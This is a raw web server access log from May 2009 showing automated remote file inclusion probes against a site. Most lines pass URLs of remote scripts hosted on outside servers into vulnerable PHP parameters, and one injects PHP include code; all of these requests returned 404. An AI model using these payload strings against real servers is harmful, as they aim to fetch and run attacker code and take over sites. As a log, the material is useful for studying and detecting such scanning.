217.147.29.190 - - [31/May/2009:09:39:10 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 324
217.147.29.190 - - [31/May/2009:09:39:15 -0400] "GET /errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 291
217.147.29.190 - - [31/May/2009:09:39:15 -0400] "GET /log/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 295
217.147.29.190 - - [31/May/2009:09:39:15 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 324
209.200.8.89 - - [31/May/2009:09:39:16 -0400] "GET //index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 291
209.200.8.89 - - [31/May/2009:09:39:16 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 322
209.200.8.89 - - [31/May/2009:09:39:18 -0400] "GET /log//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 295
217.147.29.190 - - [31/May/2009:09:39:26 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 324
72.32.68.153 - - [31/May/2009:09:41:30 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 315
72.32.68.153 - - [31/May/2009:09:41:30 -0400] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 319
217.147.29.190 - - [31/May/2009:09:42:14 -0400] "GET /log/sdaglobal.org-access_log.1//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 337
217.147.29.190 - - [31/May/2009:09:42:14 -0400] "GET //skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 306
217.147.29.190 - - [31/May/2009:09:42:17 -0400] "GET /log//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 310
217.147.29.190 - - [31/May/2009:09:42:58 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 320
217.147.29.190 - - [31/May/2009:09:42:58 -0400] "GET //login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 291
217.147.29.190 - - [31/May/2009:09:42:59 -0400] "GET /log//login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 295
62.146.68.61 - - [31/May/2009:09:43:10 -0400] "GET //search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 288
62.146.68.61 - - [31/May/2009:09:43:15 -0400] "GET /log//search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 292
62.146.68.61 - - [31/May/2009:09:43:15 -0400] "GET /log/sdaglobal.org-access_log.4//search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 319
62.146.68.61 - - [31/May/2009:09:43:15 -0400] "GET /log/sdaglobal.org-access_log//search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 317
69.94.125.100 - - [31/May/2009:09:43:34 -0400] "GET /log/sdaglobal.org-access_log.3//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 344
221.139.104.104 - - [31/May/2009:09:46:12 -0400] "GET /log//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 310
221.139.104.104 - - [31/May/2009:09:46:12 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 339
221.139.104.104 - - [31/May/2009:09:46:36 -0400] "GET /log/sdaglobal.org-error_log.1%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 338
85.18.117.101 - - [31/May/2009:09:46:51 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 315
65.55.208.244 - - [31/May/2009:09:47:36 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.208.244 - - [31/May/2009:09:47:36 -0400] "GET /log/china.sdaglobal.org-error_log.4 HTTP/1.1" 200 41219
65.55.208.244 - - [31/May/2009:09:47:38 -0400] "GET /log/hitechemall.com-error_log HTTP/1.1" 200 205
65.55.208.244 - - [31/May/2009:09:47:39 -0400] "GET /log/fable.hitechemall.com-access_log.4 HTTP/1.1" 200 216628
207.44.232.81 - - [31/May/2009:09:47:45 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 364
207.44.232.81 - - [31/May/2009:09:47:54 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 364
221.139.104.104 - - [31/May/2009:09:49:45 -0400] "GET //tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 306
221.139.104.104 - - [31/May/2009:09:49:45 -0400] "GET /log//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 310
221.139.104.104 - - [31/May/2009:09:49:45 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 339
85.18.117.101 - - [31/May/2009:09:50:25 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 315
200.142.148.142 - - [31/May/2009:09:50:49 -0400] "GET /log//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 310
200.142.148.142 - - [31/May/2009:09:50:49 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 339
200.142.148.142 - - [31/May/2009:09:51:14 -0400] "GET /log/sdaglobal.org-error_log.1%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 338
85.18.117.101 - - [31/May/2009:09:55:25 -0400] "GET /log/sdaglobal.org-access_log//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 311
85.18.117.101 - - [31/May/2009:09:55:43 -0400] "GET /log/sdaglobal.org-access_log.4//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 313
200.142.148.142 - - [31/May/2009:09:56:02 -0400] "GET /log/sdaglobal.org-access_log.3//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 337
217.147.29.190 - - [31/May/2009:09:56:10 -0400] "GET /log/sdaglobal.org-access_log.4//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 337
200.142.148.142 - - [31/May/2009:09:56:44 -0400] "GET /log/sdaglobal.org-error_log.1//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 336
121.0.141.241 - - [31/May/2009:09:58:48 -0400] "GET /log/sdaglobal.org-access_log.4//modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 341
206.176.137.21 - - [31/May/2009:09:59:38 -0400] "GET //modules/TotalCalendar/config.php?inc_dir=http://www.search9.net/config/proxy/ec.txt?? HTTP/1.1" 404 314
206.176.137.21 - - [31/May/2009:09:59:38 -0400] "GET //modules/TotalCalendar/config.php?inc_dir=http://www.geocities.com/goodyes20/id.txt?? HTTP/1.1" 404 314
206.176.137.21 - - [31/May/2009:09:59:39 -0400] "GET /log//modules/TotalCalendar/config.php?inc_dir=http://www.search9.net/config/proxy/ec.txt?? HTTP/1.1" 404 318
206.176.137.21 - - [31/May/2009:09:59:41 -0400] "GET /log//modules/TotalCalendar/config.php?inc_dir=http://www.geocities.com/goodyes20/id.txt?? HTTP/1.1" 404 318
77.221.130.17 - - [31/May/2009:10:01:07 -0400] "GET //include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 307
77.221.130.17 - - [31/May/2009:10:01:07 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 311
77.221.130.17 - - [31/May/2009:10:01:07 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 336
77.221.130.17 - - [31/May/2009:10:01:12 -0400] "GET /log/sdaglobal.org-error_log.1//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 337
77.221.130.17 - - [31/May/2009:10:01:30 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 336
77.221.130.17 - - [31/May/2009:10:01:30 -0400] "GET //include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 307
77.221.130.17 - - [31/May/2009:10:01:30 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 311
77.221.130.17 - - [31/May/2009:10:01:30 -0400] "GET /log/sdaglobal.org-error_log.1//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 337
121.165.73.157 - - [31/May/2009:10:02:09 -0400] "GET /log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 340
121.165.73.157 - - [31/May/2009:10:02:09 -0400] "GET /log/sdaglobal.org-access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 365
121.165.73.157 - - [31/May/2009:10:02:09 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 336
77.221.130.17 - - [31/May/2009:10:02:24 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 336
77.221.130.17 - - [31/May/2009:10:02:24 -0400] "GET //include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 307
77.221.130.17 - - [31/May/2009:10:02:24 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 311
77.221.130.17 - - [31/May/2009:10:02:26 -0400] "GET /log/sdaglobal.org-error_log.1//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.1" 404 337
121.165.73.157 - - [31/May/2009:10:02:47 -0400] "GET /log/sdaglobal.org-access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 367
121.165.73.157 - - [31/May/2009:10:04:22 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 336
121.165.73.157 - - [31/May/2009:10:05:21 -0400] "GET /log/sdaglobal.org-access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 365
212.97.132.101 - - [31/May/2009:10:05:42 -0400] "GET //include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 307
212.97.132.101 - - [31/May/2009:10:05:42 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 336
212.97.132.101 - - [31/May/2009:10:05:42 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 311
212.97.132.101 - - [31/May/2009:10:05:42 -0400] "GET /log/sdaglobal.org-error_log.4//include/admin.lib.inc.php?site_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 337
65.55.106.237 - - [31/May/2009:10:10:52 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.106.237 - - [31/May/2009:10:11:54 -0400] "GET /log/china.sdaglobal.org-error_log.2 HTTP/1.1" 200 46355
69.50.197.106 - - [31/May/2009:10:15:43 -0400] "GET /log//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
69.50.197.106 - - [31/May/2009:10:15:43 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339
69.50.197.106 - - [31/May/2009:10:15:43 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 306
69.50.197.106 - - [31/May/2009:10:15:54 -0400] "GET /log//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
69.50.197.106 - - [31/May/2009:10:15:54 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339
69.50.197.106 - - [31/May/2009:10:15:54 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 306
69.50.197.106 - - [31/May/2009:10:16:02 -0400] "GET /log/sdaglobal.org-access_log%20%20//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 337
69.50.197.106 - - [31/May/2009:10:16:11 -0400] "GET /log/sdaglobal.org-access_log%20%20//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 337
83.103.72.130 - - [31/May/2009:10:18:27 -0400] "GET /log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 310
83.103.72.130 - - [31/May/2009:10:18:27 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 306
83.103.72.130 - - [31/May/2009:10:18:27 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 339
83.103.72.130 - - [31/May/2009:10:19:03 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 339
69.50.197.106 - - [31/May/2009:10:19:52 -0400] "GET /log/sdaglobal.org-access_log.3//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 337
209.200.8.89 - - [31/May/2009:10:19:57 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 356
209.200.8.89 - - [31/May/2009:10:19:59 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 329
209.200.8.89 - - [31/May/2009:10:19:59 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 356
209.200.8.89 - - [31/May/2009:10:20:01 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 325
65.55.209.1 - - [31/May/2009:10:20:12 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.209.1 - - [31/May/2009:10:20:16 -0400] "GET /log/english.sdaglobal.org-error_log.1 HTTP/1.1" 200 234050
89.223.3.98 - - [31/May/2009:10:21:29 -0400] "GET //skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 306
89.223.3.98 - - [31/May/2009:10:21:29 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339
89.223.3.98 - - [31/May/2009:10:21:29 -0400] "GET /log//skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 310
69.50.197.106 - - [31/May/2009:10:21:34 -0400] "GET /log/sdaglobal.org-access_log.3//agendax/addevent.inc.php?agendax_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 337
89.223.3.98 - - [31/May/2009:10:21:35 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339
89.223.3.98 - - [31/May/2009:10:21:35 -0400] "GET /log//skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 310
89.223.3.98 - - [31/May/2009:10:21:35 -0400] "GET //skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 306
89.223.3.98 - - [31/May/2009:10:22:50 -0400] "GET /log/sdaglobal.org-error_log.4%20%20//skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 338
89.223.3.98 - - [31/May/2009:10:22:50 -0400] "GET /log/sdaglobal.org-error_log.4%20%20//skin/zero_vote/error.php?dir=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 338
88.183.32.67 - - [31/May/2009:10:24:03 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 371
88.183.32.67 - - [31/May/2009:10:24:05 -0400] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 340
88.183.32.67 - - [31/May/2009:10:24:05 -0400] "GET /log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 344
85.18.117.101 - - [31/May/2009:10:26:54 -0400] "GET /plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 317
61.81.17.108 - - [31/May/2009:10:26:56 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 366
61.81.17.108 - - [31/May/2009:10:26:56 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 333
61.81.17.108 - - [31/May/2009:10:26:57 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 337
85.18.117.101 - - [31/May/2009:10:27:00 -0400] "GET /log/sdaglobal.org-access_log%20%20/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 348
85.18.117.101 - - [31/May/2009:10:27:02 -0400] "GET /log/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 321
209.200.8.89 - - [31/May/2009:10:28:40 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 325
209.200.8.89 - - [31/May/2009:10:28:41 -0400] "GET /log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 329
209.51.152.234 - - [31/May/2009:10:28:53 -0400] "GET /log/sdaglobal.org-access_log.1/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 339
209.51.152.234 - - [31/May/2009:10:28:54 -0400] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 308
209.51.152.234 - - [31/May/2009:10:28:54 -0400] "GET /log/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 312
85.18.117.101 - - [31/May/2009:10:29:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 350
67.212.165.114 - - [31/May/2009:10:29:29 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346
67.212.165.114 - - [31/May/2009:10:29:29 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 377
67.212.165.114 - - [31/May/2009:10:29:29 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350
83.103.72.130 - - [31/May/2009:10:29:31 -0400] "GET /log/sdaglobal.org-access_log.1//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 337
67.212.165.114 - - [31/May/2009:10:29:33 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346
67.212.165.114 - - [31/May/2009:10:29:33 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 379
67.212.165.114 - - [31/May/2009:10:29:33 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350
122.117.184.187 - - [31/May/2009:10:30:39 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
122.117.184.187 - - [31/May/2009:10:30:39 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
88.183.32.67 - - [31/May/2009:10:30:39 -0400] "GET /log/sdaglobal.org-access_log//login.php?dir=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 320
61.81.17.108 - - [31/May/2009:10:30:40 -0400] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 308
88.183.32.67 - - [31/May/2009:10:30:41 -0400] "GET //login.php?dir=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 291
61.81.17.108 - - [31/May/2009:10:30:41 -0400] "GET /log/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 312
61.81.17.108 - - [31/May/2009:10:30:41 -0400] "GET /log/sdaglobal.org-access_log.1/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 339
88.183.32.67 - - [31/May/2009:10:30:42 -0400] "GET /log//login.php?dir=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 295
67.212.165.114 - - [31/May/2009:10:30:47 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346
67.212.165.114 - - [31/May/2009:10:30:47 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 350
67.212.165.114 - - [31/May/2009:10:30:47 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 377
88.183.32.67 - - [31/May/2009:10:30:55 -0400] "GET /log/sdaglobal.org-error_log.4//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 370
